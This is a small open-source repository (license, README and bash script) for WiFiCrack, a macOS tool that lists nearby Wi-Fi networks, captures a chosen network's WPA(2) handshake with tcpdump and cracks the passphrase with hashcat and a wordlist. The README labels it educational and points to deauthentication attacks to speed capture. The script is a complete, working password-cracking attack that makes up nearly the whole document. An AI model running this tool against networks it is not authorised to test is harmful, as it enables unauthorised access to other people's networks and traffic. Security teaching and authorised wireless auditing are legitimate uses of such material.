├── LICENSE
├── README.md
└── WiFiCrack.sh

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 phenotypic

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# WiFiCrack

#### This repository is not actively maintained. See [WiFiCrackPy](https://github.com/phenotypic/WiFiCrackPy) for an updated version of this project.

WiFiCrack demonstrates some of the security flaws associated with WPA(2) networks by showing how simple and efficient cracking can be. It captures the Wi-Fi packets that make up a WPA(2) handshake and then uses [hashcat](https://github.com/hashcat/hashcat) to attempt to recover the passphrase from that capture. The script is for educational purposes and should not be misused.

## Prerequisites

You must have [Xcode](https://itunes.apple.com/us/app/xcode/id497799835?l=en&mt=12) installed. You will also need to install any other outstanding requirements:

| Command | Installation |
| --- | --- |
| `hashcat` | Manual installation: install via [brew](https://brew.sh) by running `brew install hashcat` |
| `mergecap` | Manual installation: comes with the [Wireshark](https://www.wireshark.org) application (v2.6.12) |
| `./hashcat-utils/src/cap2hccapx.bin` | Automatic installation option when the script is run |

**Note:** You will also need to supply a word list for hashcat.

**Note:** The script has been successfully tested on macOS Catalina using the `bash` shell; `zsh` may cause some problems.

## Usage

Download with:
```
git clone https://github.com/phenotypic/WiFiCrack.git
```

Run from the same directory with:
```
bash WiFiCrack.sh
```

The script is fairly easy to use: simply run it using the command above and enter your `sudo` password when prompted. Here are some flags you can add:

| Flag | Description |
| --- | --- |
| `-h` | Help: Display all available flags |
| `-k` | Keep: Keep all captured packet files (deleted at the end of the session by default) |
| `-a` | Alert: Turn off the successful-crack notification |
| `-w <path>` | Wordlist: Manually define a wordlist path (the script will prompt you otherwise) |
| `-i <interface>` | Interface: Manually set the Wi-Fi interface (the script should normally auto-detect the correct interface) |
| `-d <devices>` | Device: Manually define the 'devices' passed to hashcat |

After running the script, you will be asked to choose a network to crack.

Following the selection of a network, you may have to wait for a while until a handshake occurs on the target network (i.e. for a device to (re)connect to the network), but this can be hastened by performing a [deauthentication attack](https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack).

Once a handshake is captured, WiFiCrack will initialise `hashcat` to extract the Wi-Fi password. This step may take a while depending on a number of factors, including your processing power. If successful, you will be presented with the password; otherwise, WiFiCrack will retain the handshake in its directory in case you would like to perform another type of attack against the capture.

## To-do list

- [ ] Integrate deauthentication attack into main script
- [ ] Provide more `hashcat` attack options (e.g. brute force)
--------------------------------------------------------------------------------

/WiFiCrack.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Location of the cap2hccapx converter from hashcat-utils (this script clones it into $HOME)
cap2hccapx="$HOME/hashcat-utils/src/cap2hccapx.bin"
# Apple's command-line Wi-Fi utility, used for scanning and channel selection
airport="/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport"

GREEN='\033[0;32m'
GREENT='\033[1;32m'
RED='\033[0;31m'
REDT='\033[1;31m'
BLUE='\033[0;34m'
BLUET='\033[1;34m'
LINK='\033[0;34;4m'
PURPLE='\033[0;35m'
DARKGRAY='\033[1;30m'
DUN='\033[1;30;4m'
ORANGEBROWN='\033[0;33m'
NC='\033[0m'

ostype="$( uname -s )"
COLUMNS=$(tput cols)
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"

if [ "$ostype" != "Darwin" ]; then
    printf "${REDT}[!] ${NC}ERROR: This script is only designed for macOS.\n"
    exit 1
fi

# Pick grey tones that stay readable on the current light or dark terminal theme
TERMINALCOLOUR="$( defaults read -g AppleInterfaceStyle 2>/dev/null )"
if [[ "$TERMINALCOLOUR" == *"Dark"* ]]; then
    DARKGRAY='\033[1;37m'
    DUN='\033[1;37;4m'
else
    DARKGRAY='\033[1;30m'
    DUN='\033[1;30;4m'
fi

printf "${NC}"

clear
# Banner (the column spacing of the ASCII art is approximated; the exact original spacing was lost)
cat << "EOF"

 __          ___ ______ _  _____                _    
 \ \        / (_)  ____(_)/ ____|              | |   
  \ \  /\  / / _| |__   _| |     _ __ __ _  ___| | __
   \ \/  \/ / | |  __| | | |    | '__/ _` |/ __| |/ /
    \  /\  /  | | |    | | |____| | | (_| | (__|   < 
     \/  \/   |_|_|    |_|\_____|_|  \__,_|\___|_|\_\


EOF

cd ~/

# Option parsing. getopts replaces the original substring matching on "$@", which also
# fired whenever a flag letter happened to appear inside a path such as a wordlist name.
# Paths that contain spaces must be quoted on the command line.
keepfiles=0
noalert=0
askwordlist=1
while getopts "hkaw:i:d:" opt; do
    case "$opt" in
        h)
            echo "Help:"
            printf "  ${DARKGRAY}-h ${NC}| Show this text\n"
            printf "  ${DARKGRAY}-k ${NC}| Keep all captured packet files\n"
            printf "  ${DARKGRAY}-a ${NC}| Turn off successful crack alert\n"
            printf "  ${DARKGRAY}-w ${NC}| Manually define path to wordlist\n"
            printf "  ${DARKGRAY}-i ${NC}| Manually define a Wi-Fi interface\n"
            printf "  ${DARKGRAY}-d ${NC}| Manually define devices for hashcat\n"
            echo
            exit 0
            ;;
        k) keepfiles=1 ;;
        a) noalert=1 ;;
        w)
            # A -w path that does not exist falls back to the interactive prompt, as before
            wordlist="$OPTARG"
            if [ -f "$wordlist" ]; then
                askwordlist=0
            fi
            ;;
        i) wifiinterfacename="$OPTARG" ;;
        d) hashdevice="$OPTARG" ;;
        *)
            printf "${REDT}[!] ${NC}ERROR: Unknown option. Run with -h for help.\n"
            exit 1
            ;;
    esac
done

if ! [ -x "$(command -v mergecap)" ]; then
    printf "${REDT}[!] ${NC}ERROR: Cannot execute ${DARKGRAY}mergecap${NC}."
    printf "\n${GREENT}[+] ${NC}"
    read -p "Would you like to install Wireshark? (y/n): " ifoutput
    if [ "$ifoutput" == "y" ] || [ "$ifoutput" == "Y" ]; then
        open https://www.wireshark.org/download.html
        exit 1
    else
        printf "${BLUET}[*] ${NC}To manually install, go to: ${LINK}https://www.wireshark.org/download.html${NC}\n"
        exit 1
    fi
fi

if ! [ -x "$cap2hccapx" ]; then
    printf "${REDT}[!] ${NC}ERROR: Cannot execute ${DARKGRAY}hashcat-utils${NC}."
    printf "\n${GREENT}[+] ${NC}"
    read -p "Would you like to install hashcat-utils now? (y/n): " ifoutput
    if [ "$ifoutput" == "y" ] || [ "$ifoutput" == "Y" ]; then
        cd ~/
        git clone https://github.com/hashcat/hashcat-utils.git
        ( cd ~/hashcat-utils/src && make )
        cd ~/
        if ! [ -x "$cap2hccapx" ]; then
            printf "\n${REDT}[!] ${NC}ERROR: Still cannot execute ${DARKGRAY}hashcat-utils${NC}.\n\n"
            exit 1
        else
            printf "\n${BLUET}[*] ${NC}Finished installing ${DARKGRAY}hashcat-utils${NC}.\n\n"
        fi
    else
        printf "${BLUET}[*] ${NC}To manually install, git-clone the \"hashcat-utils\" repository and run \`make\`\n"
        exit 1
    fi
fi

if ! [ -x "$(command -v hashcat)" ]; then
    printf "${REDT}[!] ${NC}ERROR: Cannot execute ${DARKGRAY}hashcat${NC}.\n"
    printf "${BLUET}[*] ${NC}To install hashcat, first install brew from: ${LINK}https://brew.sh${NC}, then run \`brew install hashcat\`\n"
    exit 1
fi

sudo -v

cd ~/

# Auto-detect the Wi-Fi interface unless one was given with -i
if [ -z "$wifiinterfacename" ]; then
    wifiinterfacename="$( networksetup -listallhardwareports | awk '/Hardware Port: Wi-Fi/{getline; print $2}' )"
fi

sudo "$airport" -z

printf "${BLUET}[*] ${NC}Scanning for Wi-Fi networks...\n"

count=1
scan=""
while IFS= read -r line; do

    if [ "$count" == "1" ]; then
        clear
        printf "${DUN}%-6s${NC} %-1s ${DUN}%-4s${NC} %-22s ${DUN}%-5s${NC} %-15s ${DUN}%-6s${NC} %-2s ${DUN}%-7s${NC}" "Number" "" "Name" "" "BSSID" "" "Signal" "" "Channel"
    fi

    # airport -s prints one network per line: <SSID> <BSSID> <RSSI> <CHANNEL> <HT> <CC> <SECURITY>
    mad="$( echo "$line" | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' )"
    mad="${mad//[[:blank:]]/}"
    if [ -z "$mad" ]; then
        continue
    fi
    net="$( echo "$line" | sed "s/ *$mad.*//" | sed 's/^[[:space:]]*//' )"
    sig="$( echo "$line" | sed -n -e "s/^.*$mad //p" | sed 's/ .*//' )"
    chan="$( echo "$line" | sed -n -e "s/^.*$sig //p" | sed 's/ .*//' | sed 's/,.*//' )"

    # Colour the RSSI column: green is strong, orange is usable, red is weak
    if [ "$sig" -ge "-60" ]; then
        COLOR=$GREEN
    elif [ "$sig" -ge "-80" ]; then
        COLOR=$ORANGEBROWN
    else
        COLOR=$RED
    fi

    # Channels 36 and above are 5 GHz
    if [ "$chan" -ge "36" ]; then
        CHANCOLOR=$PURPLE
    else
        CHANCOLOR=$NC
    fi

    # Widen the name column for SSIDs containing non-ASCII characters so the table lines up
    ONLYASCII="$( echo "$net" | perl -pe 's/[^[:ascii:]]//g' )"
    difference=$((${#net} - ${#ONLYASCII}))
    size=$((difference*2 + 27))

    printf "\n\n${DARKGRAY}%-8s${NC} %-${size}s %-21s ${COLOR}%-9s${NC} ${CHANCOLOR}%-8s${NC}" "[$count]" "$net" "$mad" "$sig" "$chan"

    scan="$scan"$'\n'"$net~$mad~$sig~$chan"

    count=$((count + 1))
done < <(sudo "$airport" -s | tail -n +2 | sort)
count=$((count - 1))

if [ "$count" == "0" ]; then
    printf "${REDT}[!] ${NC}ERROR (airport failure): Please run WiFiCrack again...\n"
    exit 1
fi

scan="$( echo "$scan" | sed '/^[[:space:]]*$/d' )"

printf "\n\n${GREENT}[+] ${NC}"
read -p "Select a network to crack (1-$count): " numberchoice
if [[ ! $numberchoice =~ ^[0-9]+$ ]] || [ "$numberchoice" == "0" ] || (( numberchoice > count )); then
    printf "${REDT}[!] ${NC}ERROR: Invalid input...\n"
    exit 1
fi
overall="$( echo "$scan" | awk "FNR==$numberchoice" )"
# Fields are "~"-separated; a plain split avoids treating the SSID as a sed regex
IFS='~' read -r targetnet targetmac sig targetchan <<< "$overall"
printf "${BLUET}[*] ${NC}Target network set to: ${DARKGRAY}$targetnet${NC} ($targetmac)"

if [ "$askwordlist" == "1" ]; then
    printf "\n\n${GREENT}[+] ${NC}"
    read -p "Enter full path to your wordlist: " wordlist
    if [ ! -f "$wordlist" ]; then
        printf "${REDT}[!] ${NC}ERROR: File not found!\n"
        exit 1
    else
        printf "${BLUET}[*] ${NC}Wordlist set to: ${DARKGRAY}$wordlist${NC}"
    fi
fi

clear

convertsecs() {
    ((h=${1}/3600))
    ((m=(${1}%3600)/60))
    ((s=${1}%60))
    printf "%02d:%02d:%02d\n" $h $m $s
}

# Unless -k was given, remove every capture file if the script exits early
if [ "$keepfiles" != "1" ]; then
    finish() {
        sudo rm -f "$DIR/beacon.cap" "$DIR/handshake.cap" "$DIR/capture.cap" "$DIR/capture.hccapx"
    }
    trap finish EXIT
fi

start=$SECONDS
DATE="$( date +"%T" )"
echo
echo "Scan started: $DATE" | fmt -c -w $COLUMNS

# Centre the "Target network: <name>" line on the terminal
total=$((${#targetnet} + 16))
leftover=$((COLUMNS - total))
eitherside=$((leftover / 2))
eitherside2=$((eitherside - 1))
printf "%-${eitherside}s %-13s ${DARKGRAY}%-${#targetnet}s${NC} %-${eitherside2}s" "" "Target network:" "$targetnet" ""

echo
echo "Waiting for a WPA handshake. This might take a while..." | fmt -c -w $COLUMNS
echo
echo "--------------------------------------------------------------------------------"
echo

cd ~/

sudo -v

# Disassociate, tune to the target channel, then capture one beacon frame from the AP
# (cap2hccapx takes the ESSID from it) followed by EAPOL (0x888e) frames to/from the AP
sudo "$airport" -z
sudo "$airport" -c"$targetchan"
sudo tcpdump "type mgt subtype beacon and ether src $targetmac" -I -c 1 -i "$wifiinterfacename" -w "$DIR/beacon.cap" &>/dev/null
printf "${BLUET}[*] ${NC}Captured beacon frame, waiting for handshake...\n\n"

sudo tcpdump "ether proto 0x888e and ether host $targetmac" -I -U -vvv -i "$wifiinterfacename" -w "$DIR/handshake.cap" &>/dev/null &
PROC_ID=$!

commandnumber=0
commandoutput=""

# Re-run the converter every second until its last line reads "Written N WPA Handshakes ..." with N >= 1
while [ "$commandnumber" -lt "1" ] || [ "$commandoutput" != "Written" ]; do
    sudo mergecap -a -F pcap -w "$DIR/capture.cap" "$DIR/beacon.cap" "$DIR/handshake.cap" &>/dev/null
    converter="$( sudo "$cap2hccapx" "$DIR/capture.cap" "$DIR/capture.hccapx" "$targetnet" 2>/dev/null )"

    commandoutput="$( echo "$converter" | tail -1 | awk '{print $1;}' )"
    # First number on the last line, with leading zeros stripped (portable to BSD sed)
    commandnumber="$( echo "$converter" | tail -1 | grep -o -E '[0-9]+' | head -1 | sed -e 's/^0*//' )"
    if [ -z "$commandnumber" ]; then
        commandnumber=0
    fi
    sleep 1
done

echo "$converter"

if [ "$keepfiles" != "1" ]; then
    sudo rm -f "$DIR/beacon.cap" "$DIR/handshake.cap" "$DIR/capture.cap"
fi

sudo kill $PROC_ID

DATE="$( date +"%T" )"
duration=$(( SECONDS - start ))
echo
echo "--------------------------------------------------------------------------------"
echo
echo "Scan finished, captured $commandnumber handshakes!" | fmt -c -w $COLUMNS

duration="$( convertsecs $duration )"

echo "Time ended: $DATE ($duration)" | fmt -c -w $COLUMNS
echo

sleep 3

# From here on the .hccapx must survive an exit so a failed crack can be retried manually,
# so drop the cleanup trap (the original replaced finish with a no-op function)
if [ "$keepfiles" != "1" ]; then
    trap - EXIT
fi

clear
printf "\n${BLUET}[*] ${NC}Starting hashcat in...\n"
sleep 1 && printf "\n3"
echo
sleep 1 && printf "\n2"
echo
sleep 1 && printf "\n1"
sleep 1
clear

cd ~/

# Hash mode 2500 (hccapx) is deprecated in current hashcat releases in favour of mode 22000
# and its newer input format; see the WiFiCrackPy fork linked from the README
if [ -z "$hashdevice" ]; then
    cracker="$( hashcat -m 2500 "$DIR/capture.hccapx" "$wordlist" | tee /dev/tty | sed -e "/:$targetnet:/q" )"
else
    cracker="$( hashcat -d "$hashdevice" -m 2500 "$DIR/capture.hccapx" "$wordlist" | tee /dev/tty | sed -e "/:$targetnet:/q" )"
fi

clear

# A cracked entry is printed as hash:ap_mac:client_mac:essid:password; keep the last match
cracked="$( echo "$cracker" | grep -F ":$targetnet:" | tail -1 )"
pass="${cracked##*:"$targetnet":}"

if [ -z "$pass" ]; then
    echo
    printf "${REDT}"
    echo "WiFiCrack failed..." | fmt -c -w $COLUMNS
    printf "${NC}"
    echo
    echo "Kept handshake, crack manually with:" | fmt -c -w $COLUMNS
    printf "${DARKGRAY}"
    if [ -z "$hashdevice" ]; then
        echo "hashcat -m 2500 $DIR/capture.hccapx $wordlist" | fmt -c -w $COLUMNS
    else
        echo "hashcat -d $hashdevice -m 2500 $DIR/capture.hccapx $wordlist" | fmt -c -w $COLUMNS
    fi
    printf "${NC}"
    echo
else
    if [ "$keepfiles" != "1" ]; then
        sudo rm -f "$DIR/capture.hccapx"
    fi
    echo
    printf "${GREENT}"
    echo "WiFiCrack succeeded!" | fmt -c -w $COLUMNS
    printf "${NC}"
    echo
    echo "Password for \"$targetnet\":" | fmt -c -w $COLUMNS
    printf "${DARKGRAY}"
    echo "$pass" | fmt -c -w $COLUMNS
    printf "${NC}"
    echo
    if [ "$noalert" != "1" ]; then
        osascript -e 'display notification "Password for '"$targetnet"': '"$pass"'" with title "WiFiCrack"'
    fi
fi
--------------------------------------------------------------------------------